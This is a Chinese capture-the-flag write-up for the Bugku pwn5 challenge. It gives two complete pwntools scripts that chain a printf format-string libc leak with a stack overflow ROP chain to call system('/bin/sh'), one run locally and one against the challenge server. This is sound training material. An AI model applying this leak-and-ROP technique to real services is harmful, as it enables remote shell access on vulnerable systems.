bugku--pwn5

gclome

原题链接：https://ctf.bugku.com/challenges#pwn5
附件：



writeup
writeup 链接：https://blog.csdn.net/AcSuccess/article/details/104391287

checksec

1. [*] '/mnt/hgfs/ubuntu_share/pwn/bugku/human'
   
2.     Arch:     amd64-64-little
   
3.     RELRO:    Partial RELRO
   
4.     Stack:    No canary found
   
5.     NX:       NX enabled
   
6.     PIE:      No PIE (0x400000)
   

复制代码

IDA分析

• 很多同学会发现，自己的IDA上全是字符串的地址，不是汉字
• 像下面这样
  

• 这时可以双击任意一个地址，我用的是byte_400978
• 然后将一整块地址内容全选，单击右键
• 就会有相应的汉字，点击就可以进行转换
  

分析程序

• 发现两次read，第一次读8个字节，第二次读入0x40个字节（第二次存在栈溢出）
• printf存在字符串格式化漏洞
• 断点断在printf处，gdb调试
  

    在红框处发现了__libc_start_main的地址
    先将其泄露出来，然后查找libc版本
    在栈上是第6个位置，再加上6个寄存器，也就是printf函数的第12个参数，格式化字符串中应该填11
    之后根据libc版本查找system函数和/bin/sh字符串地址进行利用

填写的padding中还必须包括鸽子和真香两个词，不然程序直接exit(0)

    百度告诉我一个字占两个字节，四个字也就是8个字节，但在实际的debug中，却占了12个字节


确定libc版本

• 使用泄露出地址的最后12位，使用该网站
• 进行查询偏移
  

编写Exp

1. from pwn import *
   
2. from LibcSearcher import *
   
3. 
   
4. context.log_level = "DEBUG"
   
5. 
   
6. sh = process("human")
   
7. #sh = remote("114.116.54.89", 10005)
   
8. 
   
9. payload = "%11$p"
   
10. 
    
11. sh.recv()
    
12. 
    
13. sh.sendline(payload)
    
14. 
    
15. #sh.recvline()
    
16. 
    
17. #print sh.recv()
    
18. 
    
19. libc_addr = sh.recvline()
    
20. 
    
21. #print "asdasd:" + libc_addr
    
22. 
    
23. libc_addr = int(libc_addr[2:14],16)
    
24. 
    
25. print "libc_main_start_addr is:" + hex(libc_addr)
    
26. 
    
27. #libc = LibcSearcher("__libc_start_main", libc_addr)
    
28. 
    
29. #libc_base = libc_addr - libc.dump("__libc_start_main")
    
30. 
    
31. libc_base = libc_addr - 0x020830
    
32. 
    
33. system_addr = libc_base + 0x045390
    
34. 
    
35. binsh_addr = libc_base + 0x18cd57
    
36. 
    
37. gezi = "鸽子"
    
38. 
    
39. zhenxiang = "真香"
    
40. 
    
41. pop_addr = 0x0000000000400933
    
42. 
    
43. payload = gezi + zhenxiang + 'a' * 28 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)
    
44. 
    
45. sh.recvuntil("人类还有什么本质?")
    
46. 
    
47. sh.sendline(payload)
    
48. 
    
49. sh.interactive()
    
50. 
    

复制代码

注意

• 服务器端IO和本地IO之间可能有区别
• 我在本地打得通，但服务器就打不通了
• 原因是服务器比本地多发送了一个回车字符
• 多写一个recv(1)就好了
  

1. from pwn import *
   
2. from LibcSearcher import *
   
3. 
   
4. context.log_level = "DEBUG"
   
5. 
   
6. #sh = process("human")
   
7. sh = remote("114.116.54.89", 10005)
   
8. 
   
9. payload = "%11$p"
   
10. 
    
11. sh.recv()
    
12. 
    
13. sh.sendline(payload)
    
14. 
    
15. sh.recv(1)
    
16. 
    
17. #print sh.recv()
    
18. 
    
19. libc_addr = sh.recvline()
    
20. 
    
21. #print "asdasd:" + libc_addr
    
22. 
    
23. libc_addr = int(libc_addr[2:14],16)
    
24. 
    
25. print "libc_main_start_addr is:" + hex(libc_addr)
    
26. 
    
27. #libc = LibcSearcher("__libc_start_main", libc_addr)
    
28. 
    
29. #libc_base = libc_addr - libc.dump("__libc_start_main")
    
30. 
    
31. libc_base = libc_addr - 0x020830
    
32. 
    
33. system_addr = libc_base + 0x045390
    
34. 
    
35. binsh_addr = libc_base + 0x18cd57
    
36. 
    
37. gezi = "鸽子"
    
38. 
    
39. zhenxiang = "真香"
    
40. 
    
41. pop_addr = 0x0000000000400933
    
42. 
    
43. payload = gezi + zhenxiang + 'a' * 28 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)
    
44. 
    
45. sh.recvuntil("人类还有什么本质?")
    
46. 
    
47. sh.sendline(payload)
    
48. 
    
49. sh.interactive()
    

复制代码